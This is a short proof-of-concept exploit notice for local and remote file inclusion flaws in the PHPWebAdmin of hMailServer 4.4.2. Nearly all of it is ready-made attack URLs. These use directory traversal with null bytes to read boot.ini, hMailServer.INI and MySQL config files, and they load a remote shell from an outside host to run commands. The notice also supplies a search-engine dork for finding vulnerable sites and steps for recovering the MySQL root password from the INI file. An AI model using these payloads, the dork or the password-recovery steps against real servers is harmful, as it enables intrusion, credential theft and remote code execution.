hmailserver initialize.php,hMAilServer 4.4.2 (PHPWebAdmin) local & remote file inclusion

hMAilServer 4.4.2 (PHPWebAdmin) local & remote file inclusion poc

by Nine:Situations:Group::strawdog

------------------------------------------------------------------------

our site: http://retrogod.altervista.org

software site: http://www.hmailserver.com/

description: http://en.wikipedia.org/wiki/HMailServer

------------------------------------------------------------------------

google dork: "PHPWebAdmin for hMailServer" intitle:PHPWebAdmin -site:hmailserver.com -dork

poc:

regardless of register_globals & magic_quotes_gpc:

http://hostname/path_to_webadmin/index.php?page=background/../../../../../../../../boot.ini%00

http://hostname/path_to_webadmin/index.php?page=background/../../Bin/hMailServer.INI%00

http://hostname/path_to_webadmin/index.php?page=background/../../MySQL/my.ini%00

http://hostname/path_to_webadmin/index.php?page=background/../../../../../../../..

/../Program+Files/hmailserver/Bin/hmailserver.ini%00

with register_globals = on:

(prepare a functions.php folder on somehost.com with an index.html with your shell inside on

a php enabled server,

otherwise a functions.php shell on a php disabled one)

http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=http://www.somehost.com/&cmd=dir

with register_globals = on & magic_quotes_gpc = off :

http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=c:\boot.ini%00

http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=http://www.somehost.com/shell.txt%00&cmd=dir

http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=c:\Program+Files\hMailServer\Bin\hMailServer.INI%00

http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=../Bin/hMailServer.INI%00

"Bin" folder can be found in a different location, disclose the path by simply calling:

http://hostname/path_to_webadmin/initialize.php

interesting file:

hMailServer.INI - contains two interesting fields:

- the "Administrator password" crypted with md5,

- by having knowledge of that you can calculate the MySQL root password,

specified in the "password" field.

You can do this by using the /Addons/Utilities/DecryptBlowfish.vbs script